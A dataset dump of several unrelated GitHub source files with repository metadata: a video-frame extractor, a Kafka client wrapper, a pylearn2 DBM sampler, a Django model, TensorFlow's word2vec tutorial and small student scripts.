# Convert to grayscale and display frames
if self.status:
cv2.imshow('frame', self.frame)
# Press 'q' on keyboard to stop recording
key = cv2.waitKey(1)
if key == ord('q'):
self.capture.release()
cv2.destroyAllWindows()
exit(1)
def save_frame(self):
# Save grayscale frame into video output file
if self.status: # self.capture.isOpened():
if self.padding > 0:
filename = os.path.join(self.output_path, self.prefix + "{1:0{0}}".format(self.padding,self.frame_counter) + self.extension)
else:
filename = os.path.join(self.output_path, self.prefix + str(self.frame_counter) + self.extension)
cv2.imwrite(filename, self.frame)
def close(self, exit=False):
self.capture.release()
cv2.destroyAllWindows()
if exit:
exit(1)
class VideoToGrayImage(VideoToImage):
def __init__(self, src=0, output_path = './', extension = '.jpg', prefix='frame_', padding=-1):
super(VideoToGrayImage,self).__init__(src=src, output_path = output_path, extension = extension, prefix=prefix, padding=padding)
def update(self):
super().update()
if self.status:
self.frame = cv2.cvtColor(self.frame, cv2.COLOR_BGR2GRAY)
def run(video_src, output_path=None, extension ='.png', plot='n', prefix='frame_', padding=-1, gray = 'y'):
'''
run default video to image
'''
if output_path is None:
output_path = os.path.dirname(video_src)
output_path = os.path.join(output_path,'video_images')
if not os.path.exists(output_path):
os.mkdir(output_path)
if gray == 'y':
video_stream_widget = VideoToGrayImage(video_src, output_path = output_path, extension = extension, prefix=prefix, padding=padding)
else:
video_stream_widget = VideoToImage(video_src, output_path=output_path, extension=extension, prefix=prefix, padding=padding)
if plot == 'y':
print('stop convertion by pressing q')
for _ in tqdm(range(video_stream_widget.n_frames)):
if video_stream_widget.capture.isOpened():
try:
video_stream_widget.update()
if plot == 'y':
video_stream_widget.show_frame()
video_stream_widget.save_frame()
except AttributeError:
pass
else:
video_stream_widget.close()
video_stream_widget.close()
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Convert to gray avi videos.')
parser.add_argument('--target', metavar='target', type=str,
help='target avi video full path')
parser.add_argument('--output', metavar='output', type=str,
help='output path where the images are saved')
parser.add_argument('--plot', metavar='plot', type=str, default='y',
help='show video during convertion flag (y(default), or n))')
parser.add_argument('--extension', metavar='extension', type=str, default='.jpg',
help='extension of the imamge output (default: .jpg)')
args = parser.parse_args()
video_src = args.target
print(video_src)
video_stream_widget = VideoToGrayImage(video_src, output_path = args.output, extension = args.extension)
print('stop convertion by pressing q')
while video_stream_widget.capture.isOpened():
try:
video_stream_widget.update()
if args.plot == 'y':
video_stream_widget.show_frame()
video_stream_widget.save_frame()
except AttributeError:
pass
|
[
"ariel.iporre.rivas@gmail.com"
] |
ariel.iporre.rivas@gmail.com
|
4de5a482ac1a2b84b0fc9163f756e769c371d213
|
407d4e49248cc7aa244d75439360b34cd8e57e71
|
/venv/Scripts/easy_install-script.py
|
53ca27394e3788212ea5e8cf08b912eade2cbd08
|
[] |
no_license
|
fati-ma/POS-tagger
|
3c38e26919d6f2a27442bb200e3d6d6fdb57838d
|
d72981cb4976089b68000a43f9c82a9df192605b
|
refs/heads/main
| 2023-07-31T14:25:43.363787
| 2021-09-21T12:46:51
| 2021-09-21T12:46:51
| 408,569,546
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 449
|
py
|
#!C:\Users\delta\PycharmProjects\Test11\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==40.8.0','console_scripts','easy_install'
__requires__ = 'setuptools==40.8.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('setuptools==40.8.0', 'console_scripts', 'easy_install')()
)
|
[
"fatima.atiyya@yahoo.com"
] |
fatima.atiyya@yahoo.com
|
4392e82cf5bce518c62400d99c6a9685baa753f0
|
db8ddcd93af0386a2cdf7c06f131c5acbfbcc4af
|
/UE-6.2.py
|
2043ffa531c2ac802df0d8ae21ed5431236ec966
|
[] |
no_license
|
Damanu/CP-UE
|
584a088480d3252e389a70d64c98f64722d35a5d
|
8264839363275cd4f585cec97b7868e1b31e0114
|
refs/heads/master
| 2021-01-10T18:01:14.338989
| 2016-01-14T10:11:31
| 2016-01-14T10:11:31
| 44,479,904
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 117
|
py
|
#/usr/bin/python!
import matplotlib.pyplot as plt
import numpy as np
import sys
if __name__=="__main__":
main()
|
[
"e.schwarzhans@gmx.at"
] |
e.schwarzhans@gmx.at
|
f6d5e74ffb4eeffb6b0b056154516157ac157cef
|
1edf3c5a83c3d9d1fe63a38a67db667c89ee0642
|
/botTester/unpredictable.py
|
0d9e45bcfb074f7611b9ecea581d00d73c3ce08a
|
[] |
no_license
|
roctbb/GoTo
|
e0ebbb9a70cd4c123a43d980299da043bc8537c2
|
6ba9cca18e106acc2e6d441dd98b597e397ec211
|
refs/heads/master
| 2020-05-21T20:13:52.486735
| 2018-11-18T09:38:35
| 2018-11-18T09:38:35
| 61,876,224
| 3
| 4
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 136
|
py
|
__author__ = 'roctbb'
from random import choice
def step(history):
return choice(["камень", "ножницы","бумага"])
|
[
"roctbb@gmail.com"
] |
roctbb@gmail.com
|
2bccf9d5a6413459ed13f822479d9f1f10160631
|
bbc712831e5adeb0ea3b6434f5bbde63f2cbea34
|
/delete.py
|
be28977592fb44ee804a25878b09ccb81c10ca8f
|
[] |
no_license
|
gls369/database-sample
|
b5add9e46ffb03cc73bf24c55218aeed77efbd23
|
c3da7cbf1bb9c2a504ce7841ffd38da7dffc9bb6
|
refs/heads/master
| 2020-04-12T11:10:22.085991
| 2018-12-20T13:13:29
| 2018-12-20T13:13:29
| 162,451,380
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 147
|
py
|
import requests
import json
headers = {"Content-Type" : "application/json"}
res = requests.delete("http://127.0.0.1:5000/CV/1")
print (res.text)
|
[
"gls@live.hk"
] |
gls@live.hk
|
caa5d7f22e33db8b41abcb461289fd84c5a814ee
|
de24f83a5e3768a2638ebcf13cbe717e75740168
|
/moodledata/vpl_data/40/usersdata/78/24413/submittedfiles/main.py
|
eab508f3756a8f0f59276fbd4bed79017c152c6b
|
[] |
no_license
|
rafaelperazzo/programacao-web
|
95643423a35c44613b0f64bed05bd34780fe2436
|
170dd5440afb9ee68a973f3de13a99aa4c735d79
|
refs/heads/master
| 2021-01-12T14:06:25.773146
| 2017-12-22T16:05:45
| 2017-12-22T16:05:45
| 69,566,344
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 332
|
py
|
# -*- coding: utf-8 -*-
from __future__ import division
import funcoes
#COMECE AQUI
m=int(input('digite o valor de m:')
e=input('digite o valor de epsilon:')
m=funcoes.absoluto(m)
pi=funcoes.pi(m)
cosseno=funcoes.cosseno(pi/5,e)
razaoaurea=funcoes.razaoaurea(m,e)
print('%.15f' %pi)
print('%.15f' %razaoaurea)
|
[
"rafael.mota@ufca.edu.br"
] |
rafael.mota@ufca.edu.br
|
1ea53c97efbef18c6d8500971ef041b011cad8a1
|
4467ac07a53475b5906471de1fd2354d9d277f83
|
/pylearn2/models/dbm/sampling_procedure.py
|
bd6522e1b1bdab962a509475901ff0f3e608629d
|
[] |
no_license
|
YS-L/pylearn2
|
01161cc0b160703aff39c41d2251736a51b0c1ae
|
55e40690f104850bd336952692b17803c01dcb6c
|
refs/heads/master
| 2020-02-26T13:15:24.420474
| 2014-02-19T23:23:41
| 2014-02-19T23:23:41
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,080
|
py
|
__authors__ = ["Ian Goodfellow", "Vincent Dumoulin"]
__copyright__ = "Copyright 2012-2013, Universite de Montreal"
__credits__ = ["Ian Goodfellow"]
__license__ = "3-clause BSD"
__maintainer__ = "Ian Goodfellow"
from theano.compat import OrderedDict
from pylearn2.utils import py_integer_types
class SamplingProcedure(object):
"""
Procedure for sampling from a DBM.
"""
def set_dbm(self, dbm):
"""
.. todo::
WRITEME
"""
self.dbm = dbm
def sample(self, layer_to_state, theano_rng, layer_to_clamp=None,
num_steps=1):
"""
Samples from self.dbm using `layer_to_state` as starting values.
Parameters
----------
layer_to_state : dict
Maps the DBM's Layer instances to theano variables representing \
batches of samples of them.
theano_rng : theano.sandbox.rng_mrg.MRG_RandomStreams
WRITEME
layer_to_clamp : dict, optional
Maps Layers to bools. If a layer is not in the dictionary, \
defaults to False. True indicates that this layer should be \
clamped, so we are sampling from a conditional distribution \
rather than the joint distribution.
Returns
-------
layer_to_updated_state : dict
Maps the DBM's Layer instances to theano variables representing \
batches of updated samples of them.
"""
raise NotImplementedError(str(type(self))+" does not implement " +
"sample.")
class GibbsEvenOdd(SamplingProcedure):
"""
The specific sampling schedule used to sample all of the even-idexed
layers of model.hidden_layers, then the visible layer and all the
odd-indexed layers.
"""
def sample(self, layer_to_state, theano_rng, layer_to_clamp=None,
num_steps=1):
"""
.. todo::
WRITEME
"""
# Validate num_steps
assert isinstance(num_steps, py_integer_types)
assert num_steps > 0
# Implement the num_steps > 1 case by repeatedly calling the
# num_steps == 1 case
if num_steps != 1:
for i in xrange(num_steps):
layer_to_state = self.sample(layer_to_state, theano_rng,
layer_to_clamp, num_steps=1)
return layer_to_state
# The rest of the function is the num_steps = 1 case
# Current code assumes this, though we could certainly relax this
# constraint
assert len(self.dbm.hidden_layers) > 0
# Validate layer_to_clamp / make sure layer_to_clamp is a fully
# populated dictionary
if layer_to_clamp is None:
layer_to_clamp = OrderedDict()
for key in layer_to_clamp:
assert (key is self.dbm.visible_layer or
key in self.dbm.hidden_layers)
for layer in [self.dbm.visible_layer] + self.dbm.hidden_layers:
if layer not in layer_to_clamp:
layer_to_clamp[layer] = False
# Assemble the return value
layer_to_updated = OrderedDict()
for i, this_layer in list(enumerate(self.dbm.hidden_layers))[::2]:
# Iteration i does the Gibbs step for hidden_layers[i]
# Get the sampled state of the layer below so we can condition
# on it in our Gibbs update
if i == 0:
layer_below = self.dbm.visible_layer
else:
layer_below = self.dbm.hidden_layers[i-1]
state_below = layer_to_state[layer_below]
state_below = layer_below.upward_state(state_below)
# Get the sampled state of the layer above so we can condition
# on it in our Gibbs step
if i + 1 < len(self.dbm.hidden_layers):
layer_above = self.dbm.hidden_layers[i + 1]
state_above = layer_to_state[layer_above]
state_above = layer_above.downward_state(state_above)
else:
state_above = None
layer_above = None
if layer_to_clamp[this_layer]:
this_state = layer_to_state[this_layer]
this_sample = this_state
else:
# Compute the Gibbs sampling update
# Sample the state of this layer conditioned
# on its Markov blanket (the layer above and
# layer below)
this_sample = this_layer.sample(state_below=state_below,
state_above=state_above,
layer_above=layer_above,
theano_rng=theano_rng)
layer_to_updated[this_layer] = this_sample
#Sample the visible layer
vis_state = layer_to_state[self.dbm.visible_layer]
if layer_to_clamp[self.dbm.visible_layer]:
vis_sample = vis_state
else:
first_hid = self.dbm.hidden_layers[0]
state_above = layer_to_updated[first_hid]
state_above = first_hid.downward_state(state_above)
vis_sample = self.dbm.visible_layer.sample(state_above=state_above,
layer_above=first_hid,
theano_rng=theano_rng)
layer_to_updated[self.dbm.visible_layer] = vis_sample
# Sample the odd-numbered layers
for i, this_layer in list(enumerate(self.dbm.hidden_layers))[1::2]:
# Get the sampled state of the layer below so we can condition
# on it in our Gibbs update
layer_below = self.dbm.hidden_layers[i-1]
# We want to sample from each conditional distribution
# ***sequentially*** so we must use the updated version
# of the state for the layers whose updates we have
# calculcated already, in layer_to_updated.
# If we used the original value from
# layer_to_state
# then we would sample from each conditional
# ***simultaneously*** which does not implement MCMC
# sampling.
state_below = layer_to_updated[layer_below]
state_below = layer_below.upward_state(state_below)
# Get the sampled state of the layer above so we can condition
# on it in our Gibbs step
if i + 1 < len(self.dbm.hidden_layers):
layer_above = self.dbm.hidden_layers[i + 1]
state_above = layer_to_updated[layer_above]
state_above = layer_above.downward_state(state_above)
else:
state_above = None
layer_above = None
if layer_to_clamp[this_layer]:
this_state = layer_to_state[this_layer]
this_sample = this_state
else:
# Compute the Gibbs sampling update
# Sample the state of this layer conditioned
# on its Markov blanket (the layer above and
# layer below)
this_sample = this_layer.sample(state_below=state_below,
state_above=state_above,
layer_above=layer_above,
theano_rng=theano_rng)
layer_to_updated[this_layer] = this_sample
# Check that all layers were updated
assert all([layer in layer_to_updated for layer in layer_to_state])
# Check that we didn't accidentally treat any other object as a layer
assert all([layer in layer_to_state for layer in layer_to_updated])
# Check that clamping worked
assert all([(layer_to_state[layer] is layer_to_updated[layer]) ==
layer_to_clamp[layer] for layer in layer_to_state])
return layer_to_updated
|
[
"markus.roth@herr-biber.de"
] |
markus.roth@herr-biber.de
|
6648b654370e9eee63bebb282364304a07b5731a
|
c422b95417eaa7ce3707f2b47c0742b53b726c19
|
/pyrandall/kafka.py
|
65c6fc3c280bc5fc38dedd7ab97e5fca6b427f18
|
[
"Apache-2.0"
] |
permissive
|
e7dal/pyrandall
|
ebd05aac5767fce7b4f148e1fac9b19d7b89c5a3
|
0d170fd6ad25332dfc819db1be09cdc2736a5e4c
|
refs/heads/master
| 2021-01-05T17:49:01.623306
| 2019-09-27T11:33:58
| 2019-09-27T11:33:58
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,573
|
py
|
import configparser
import io
import logging
import os
import sys
import time
from enum import Enum
from typing import Dict
from confluent_kafka.cimpl import Consumer, KafkaError, KafkaException, Producer
log = logging.getLogger("kafka")
class ConsumerState(Enum):
PARTITIONS_UNASSIGNED = 0
PARTITIONS_ASSIGNED = 1
TIMEOUT_SET = 2
class KafkaConn:
def __init__(self):
self.consume_lock = ConsumerState.PARTITIONS_UNASSIGNED
# callback for consumer partition assignment,
# removes lock for actual consumption
def callback_on_assignment(self, consumer, partitions):
self.consume_lock = ConsumerState.PARTITIONS_ASSIGNED
log.info(f"Assignment: {partitions}")
def check_connection(self):
def check_callback(error, event):
if error:
if error.code() == KafkaError._MSG_TIMED_OUT:
log.error(
"This Timout might indicate the broker is down or connection is misconfigured"
)
log.error(f"Error while producing initial msg: {error}")
sys.exit(1)
config = ConfigFactory(kafka_client="producer").config
config["delivery.timeout.ms"] = "3000" # 3 seconds
prod = Producer(config)
prod.produce("pyrandall", "starting simulate", callback=check_callback)
prod.flush() # block until callback is called
def prod_reporter(self, error, event):
if error:
log.error(f"Error producing the event: {error}")
else:
log.info(
f"Event produced, topic: {event.topic()}, \
partition: {event.partition()}"
)
def produce_message(self, topic, body, headers=None, partition_key=None):
if headers is None:
msg_headers = {}
self._produce(topic, body, partition_key, msg_headers)
self.producer.flush()
def init_producer(self):
log.info("starting produce")
kafka_config_producer = ConfigFactory(kafka_client="producer")
config = kafka_config_producer.config
log.info("kafka config for produce %s", config)
self.check_connection()
self.producer = Producer(config)
def _produce(self, topic, msg, partition_key=None, headers=None):
try:
if partition_key:
self.producer.produce(
topic, msg, key=partition_key, callback=self.prod_reporter
)
else:
self.producer.produce(topic, msg, callback=self.prod_reporter)
print(".", end="")
except BufferError:
log.error(
"%% Local producer queue is full (%d messages \
awaiting delivery): try again",
len(self.producer),
)
# The consume function now contains a lock, the lock is removed when the
# partitions are assigned (max 60 seconds). After assignment the regular
# timeout are used. These should be set to a couple of seconds in the
# scenario itself .
def consume(self, topic, topic_timeout):
kafka_config_consumer = ConfigFactory(kafka_client="consumer")
config = kafka_config_consumer.config
log.info("kafka config for consume %s", config)
kcons = Consumer(config)
events = []
start_time = time.monotonic()
timeout_start_time = start_time
timeout_consumer = 60.0
# actual consumer starts now
# subscribe to 1 or more topics and define the callback function
# callback is only received after consumer.consume() is called!
kcons.subscribe([topic], on_assign=self.callback_on_assignment)
log.info("Waiting for partition assignment ... (timeout at 60 seconds")
try:
while (time.monotonic() - timeout_start_time) < timeout_consumer:
# start consumption
messages = kcons.consume(timeout=0.1)
# check for partition assignment
if self.consume_lock == ConsumerState.PARTITIONS_UNASSIGNED:
# this should not happen but we are not 100% sure
if messages:
log.error("messages consumed but lock is unopened")
break
continue
# after partition assignment set the timeout again
# and reset the start time from which to determine timeout
# violation
elif self.consume_lock == ConsumerState.PARTITIONS_ASSIGNED:
timeout_start_time = time.monotonic()
timeout_consumer = topic_timeout
self.consume_lock = ConsumerState.TIMEOUT_SET
log.info("Lock has been opened, consuming ...")
# appened messages to the events list to be returned
if messages:
for msg in messages:
log.info(
f"message at offset: {msg.offset()}, \
partition: {msg.partition()}, \
topic: {msg.topic()}"
)
events.append(msg.value())
else:
# at the end check if the partition assignment was achieved
if self.consume_lock != ConsumerState.TIMEOUT_SET:
log.error("No partition assignments received in time")
except KafkaException as e:
log.error(f"Kafka error: {e}")
pass
finally:
kcons.close()
end_time = time.monotonic()
log.debug(f"this cycle took: {(end_time - start_time)} seconds")
return events
class ConfigFactory:
def __init__(self, kafka_client=None, fpath=None):
self.config = {}
kafka_properties = os.environ.get("KAFKA_PROPERTIES")
if fpath is not None:
# print("fpath")
self.config = self.from_properties(fpath)
elif kafka_properties:
# print("kafka_properties")
self.config = self.from_properties(kafka_properties)
else:
# print("from_env")
self.config = self.from_env()
if kafka_client == "consumer":
self.config["group.id"] = "pyrandall-test"
self.config["auto.offset.reset"] = "earliest"
# self.config['debug'] = "topic,msg,broker"
self.config["enable.partition.eof"] = "false"
elif kafka_client == "producer":
# self.config['debug'] = "topic,msg,broker"
self.config["max.in.flight.requests.per.connection"] = 1
self.config["enable.idempotence"] = True
self.config["retries"] = 1
self.config["delivery.timeout.ms"] = "30000" # 30 seconds
pass
@staticmethod
def from_env() -> Dict[str, str]:
config = {}
broker = os.environ.get("KAFKA_BOOTSTRAP_SERVERS", "localhost:9092")
config["bootstrap.servers"] = broker
return config
@staticmethod
def from_properties(fpath) -> Dict[str, str]:
section = "root"
with open(fpath) as f:
ini_str = io.StringIO(f"[{section}]\n" + f.read())
parser = configparser.ConfigParser()
parser.read_file(ini_str, "strioIO")
# check parsing was done correctly
assert parser.sections() == [section]
return dict(parser.items(section))
|
[
"stefano.oldeman@gmail.com"
] |
stefano.oldeman@gmail.com
|
074b33472fa2500bb79a13979ce9a9d46cd08fc4
|
764263f101d81d6c0dd9c7afc7d7a2a7db9a389b
|
/DoAnApi/models/comment.py
|
c7d8e0ea3e3930d639b4feb8e848d21df41b6ec0
|
[] |
no_license
|
nhucsau1995/DoAn
|
9008522aea31117ae6c7057e51550c5dd35608b9
|
68366c8f4e3ac0fd3f8c81afed8ab4e67ae22765
|
refs/heads/master
| 2021-09-06T07:14:11.666586
| 2017-12-12T02:01:34
| 2017-12-12T02:01:34
| 112,214,991
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 588
|
py
|
from django.db import models
from .userpj import User
from .post import Post
class Comment(models.Model):
objects = models.Manager()
user_id = models.ForeignKey(User, on_delete=models.CASCADE)
post_id = models.ForeignKey(Post, on_delete=models.CASCADE)
content = models.TextField(null=False, blank=False)
created_at = models.DateTimeField(auto_now_add=True, auto_now=False, editable=False)
updated_at = models.DateTimeField(auto_now=True, editable=True)
def __str__(self):
return '{}/{} - {}'.format(self.id, self.post_id.title, self.user_id.id)
|
[
"nhucsau1995@gmail.com"
] |
nhucsau1995@gmail.com
|
abf7eb515ae21d5ef3f410269569113c07252f57
|
22b3e3b9d5137575f4a9c8b70703ffaecfe9a5a8
|
/gauss1.py
|
34384098fbae7656a4f61a8bb77a8c6f8855db6d
|
[] |
no_license
|
abdcelikkanat/expemb
|
d2cee75fa5b533a294a3da2349cef326c627fc2e
|
e5180e9bceceba507cf4d6438541ea6d6ca541ab
|
refs/heads/master
| 2020-03-22T09:58:20.236304
| 2018-07-18T15:53:14
| 2018-07-18T15:53:14
| 139,872,581
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 13,350
|
py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Basic word2vec example."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import math
import os
import sys
import argparse
import random
from tempfile import gettempdir
import zipfile
import numpy as np
from six.moves import urllib
from six.moves import xrange # pylint: disable=redefined-builtin
import tensorflow as tf
from tensorflow.contrib.tensorboard.plugins import projector
# Give a folder path as an argument with '--log_dir' to save
# TensorBoard summaries. Default is a log folder in current directory.
current_path = os.path.dirname(os.path.realpath(sys.argv[0]))
parser = argparse.ArgumentParser()
parser.add_argument(
'--log_dir',
type=str,
default=os.path.join(current_path, 'log'),
help='The log directory for TensorBoard summaries.')
FLAGS, unparsed = parser.parse_known_args()
# Create the directory for TensorBoard variables if there is not.
if not os.path.exists(FLAGS.log_dir):
os.makedirs(FLAGS.log_dir)
# Step 1: Download the data.
url = 'http://mattmahoney.net/dc/'
# pylint: disable=redefined-outer-name
def maybe_download(filename, expected_bytes):
"""Download a file if not present, and make sure it's the right size."""
local_filename = os.path.join(gettempdir(), filename)
if not os.path.exists(local_filename):
local_filename, _ = urllib.request.urlretrieve(url + filename, local_filename)
statinfo = os.stat(local_filename)
if statinfo.st_size == expected_bytes:
print('Found and verified', filename)
else:
print(statinfo.st_size)
raise Exception('Failed to verify ' + local_filename + ' Can you get to it with a browser?')
return local_filename
filename = maybe_download('text8.zip', 31344016)
# Read the data into a list of strings.
def read_data(filename):
"""Extract the first file enclosed in a zip file as a list of words."""
with zipfile.ZipFile(filename) as f:
data = tf.compat.as_str(f.read(f.namelist()[0])).split()
return data
vocabulary = read_data(filename)
print('Data size', len(vocabulary))
# Step 2: Build the dictionary and replace rare words with UNK token.
vocabulary_size = 50000
def build_dataset(words, n_words):
"""Process raw inputs into a dataset."""
count = [['UNK', -1]] # unknown word
count.extend(collections.Counter(words).most_common(n_words - 1)) # get the most common words
dictionary = dict()
for word, _ in count:
dictionary[word] = len(dictionary) # label each word with a number
data = list()
unk_count = 0
for word in words:
index = dictionary.get(word, 0)
if index == 0: # dictionary['UNK']
unk_count += 1
data.append(index)
count[0][1] = unk_count
reversed_dictionary = dict(zip(dictionary.values(), dictionary.keys()))
return data, count, dictionary, reversed_dictionary
# Filling 4 global variables:
# data - list of codes (integers from 0 to vocabulary_size-1).
# This is the original text but words are replaced by their codes
# count - map of words(strings) to count of occurrences
# dictionary - map of words(strings) to their codes(integers)
# reverse_dictionary - maps codes(integers) to words(strings)
data, count, dictionary, reverse_dictionary = build_dataset(vocabulary, vocabulary_size)
del vocabulary # Hint to reduce memory.
print('Most common words (+UNK)', count[:5])
print('Sample data', data[:10], [reverse_dictionary[i] for i in data[:10]])
data_index = 0
# Step 3: Function to generate a training batch for the skip-gram model.
def generate_batch(batch_size, num_skips, skip_window):
global data_index
assert batch_size % num_skips == 0
assert num_skips <= 2 * skip_window
batch = np.ndarray(shape=(batch_size), dtype=np.int32)
labels = np.ndarray(shape=(batch_size, 1), dtype=np.int32)
span = 2 * skip_window + 1 # [ skip_window target skip_window ]
buffer = collections.deque(maxlen=span) # pylint: disable=redefined-builtin
if data_index + span > len(data):
data_index = 0
buffer.extend(data[data_index:data_index + span])
data_index += span
for i in range(batch_size // num_skips):
context_words = [w for w in range(span) if w != skip_window]
words_to_use = random.sample(context_words, num_skips)
for j, context_word in enumerate(words_to_use):
batch[i * num_skips + j] = buffer[skip_window]
labels[i * num_skips + j, 0] = buffer[context_word]
if data_index == len(data):
buffer.extend(data[0:span])
data_index = span
else:
buffer.append(data[data_index])
data_index += 1
# Backtrack a little bit to avoid skipping words in the end of a batch
data_index = (data_index + len(data) - span) % len(data)
return batch, labels
batch, labels = generate_batch(batch_size=8, num_skips=2, skip_window=1)
for i in range(8):
print(batch[i], reverse_dictionary[batch[i]], '->', labels[i, 0], reverse_dictionary[labels[i, 0]])
# Step 4: Build and train a skip-gram model.
batch_size = 128
embedding_size = 128 # Dimension of the embedding vector.
skip_window = 1 # How many words to consider left and right.
num_skips = 2 # How many times to reuse an input to generate a label.
num_sampled = 64 # Number of negative examples to sample.
# We pick a random validation set to sample nearest neighbors. Here we limit the
# validation samples to the words that have a low numeric ID, which by
# construction are also the most frequent. These 3 variables are used only for
# displaying model accuracy, they don't affect calculation.
valid_size = 16 # Random set of words to evaluate similarity on.
valid_window = 100 # Only pick dev samples in the head of the distribution.
valid_examples = np.random.choice(valid_window, valid_size, replace=False)
graph = tf.Graph()
with graph.as_default():
# Input data.
with tf.name_scope('inputs'):
train_inputs = tf.placeholder(tf.int32, shape=[batch_size])
train_labels = tf.placeholder(tf.int32, shape=[batch_size, 1])
valid_dataset = tf.constant(valid_examples, dtype=tf.int32)
# Ops and variables pinned to the CPU because of missing GPU implementation
with tf.device('/cpu:0'):
# Look up embeddings for inputs.
with tf.name_scope('embeddings'):
embeddings = tf.Variable(
tf.random_uniform([vocabulary_size, embedding_size], -1.0, 1.0))
embed = tf.nn.embedding_lookup(embeddings, train_inputs)
# Construct the variables for the NCE loss
with tf.name_scope('weights'):
nce_weights = tf.Variable(
tf.truncated_normal(
[vocabulary_size, embedding_size],
stddev=1.0 / math.sqrt(embedding_size)))
with tf.name_scope('biases'):
nce_biases = tf.Variable(tf.zeros([vocabulary_size]))
# Compute the average NCE loss for the batch.
# tf.nce_loss automatically draws a new sample of the negative labels each
# time we evaluate the loss.
# Explanation of the meaning of NCE loss:
# http://mccormickml.com/2016/04/19/word2vec-tutorial-the-skip-gram-model/
with tf.name_scope('loss'):
loss = tf.reduce_mean(
tf.nn.nce_loss(
weights=nce_weights,
biases=nce_biases,
labels=train_labels,
inputs=embed,
num_sampled=num_sampled,
num_classes=vocabulary_size))
# Add the loss value as a scalar to summary.
tf.summary.scalar('loss', loss)
# Construct the SGD optimizer using a learning rate of 1.0.
with tf.name_scope('optimizer'):
optimizer = tf.train.GradientDescentOptimizer(1.0).minimize(loss)
# Compute the cosine similarity between minibatch examples and all embeddings.
norm = tf.sqrt(tf.reduce_sum(tf.square(embeddings), 1, keep_dims=True))
normalized_embeddings = embeddings / norm
valid_embeddings = tf.nn.embedding_lookup(normalized_embeddings, valid_dataset)
similarity = tf.matmul(valid_embeddings, normalized_embeddings, transpose_b=True)
# Merge all summaries.
merged = tf.summary.merge_all()
# Add variable initializer.
init = tf.global_variables_initializer()
# Create a saver.
saver = tf.train.Saver()
# Step 5: Begin training.
num_steps = 100001
with tf.Session(graph=graph) as session:
# Open a writer to write summaries.
writer = tf.summary.FileWriter(FLAGS.log_dir, session.graph)
# We must initialize all variables before we use them.
init.run()
print('Initialized')
average_loss = 0
for step in xrange(num_steps):
batch_inputs, batch_labels = generate_batch(batch_size, num_skips,
skip_window)
feed_dict = {train_inputs: batch_inputs, train_labels: batch_labels}
# Define metadata variable.
run_metadata = tf.RunMetadata()
# We perform one update step by evaluating the optimizer op (including it
# in the list of returned values for session.run()
# Also, evaluate the merged op to get all summaries from the returned "summary" variable.
# Feed metadata variable to session for visualizing the graph in TensorBoard.
_, summary, loss_val = session.run(
[optimizer, merged, loss],
feed_dict=feed_dict,
run_metadata=run_metadata)
average_loss += loss_val
# Add returned summaries to writer in each step.
writer.add_summary(summary, step)
# Add metadata to visualize the graph for the last run.
if step == (num_steps - 1):
writer.add_run_metadata(run_metadata, 'step%d' % step)
if step % 2000 == 0:
if step > 0:
average_loss /= 2000
# The average loss is an estimate of the loss over the last 2000 batches.
print('Average loss at step ', step, ': ', average_loss)
average_loss = 0
# Note that this is expensive (~20% slowdown if computed every 500 steps)
if step % 10000 == 0:
sim = similarity.eval()
for i in xrange(valid_size):
valid_word = reverse_dictionary[valid_examples[i]]
top_k = 8 # number of nearest neighbors
nearest = (-sim[i, :]).argsort()[1:top_k + 1]
log_str = 'Nearest to %s:' % valid_word
for k in xrange(top_k):
close_word = reverse_dictionary[nearest[k]]
log_str = '%s %s,' % (log_str, close_word)
print(log_str)
final_embeddings = normalized_embeddings.eval()
# Write corresponding labels for the embeddings.
with open(FLAGS.log_dir + '/metadata.tsv', 'w') as f:
for i in xrange(vocabulary_size):
f.write(reverse_dictionary[i] + '\n')
# Save the model for checkpoints.
saver.save(session, os.path.join(FLAGS.log_dir, 'model.ckpt'))
# Create a configuration for visualizing embeddings with the labels in TensorBoard.
config = projector.ProjectorConfig()
embedding_conf = config.embeddings.add()
embedding_conf.tensor_name = embeddings.name
embedding_conf.metadata_path = os.path.join(FLAGS.log_dir, 'metadata.tsv')
projector.visualize_embeddings(writer, config)
writer.close()
# Step 6: Visualize the embeddings.
# pylint: disable=missing-docstring
# Function to draw visualization of distance between embeddings.
def plot_with_labels(low_dim_embs, labels, filename):
assert low_dim_embs.shape[0] >= len(labels), 'More labels than embeddings'
plt.figure(figsize=(18, 18)) # in inches
for i, label in enumerate(labels):
x, y = low_dim_embs[i, :]
plt.scatter(x, y)
plt.annotate(
label,
xy=(x, y),
xytext=(5, 2),
textcoords='offset points',
ha='right',
va='bottom')
plt.savefig(filename)
try:
# pylint: disable=g-import-not-at-top
from sklearn.manifold import TSNE
import matplotlib.pyplot as plt
tsne = TSNE(perplexity=30, n_components=2, init='pca', n_iter=5000, method='exact')
plot_only = 500
low_dim_embs = tsne.fit_transform(final_embeddings[:plot_only, :])
labels = [reverse_dictionary[i] for i in xrange(plot_only)]
plot_with_labels(low_dim_embs, labels, os.path.join(gettempdir(), 'tsne.png'))
except ImportError as ex:
print('Please install sklearn, matplotlib, and scipy to show embeddings.')
print(ex)
|
[
"abdcelikkanat@gmail.com"
] |
abdcelikkanat@gmail.com
|
dab5a55c04a4f4242ed5725c95704470f8d27791
|
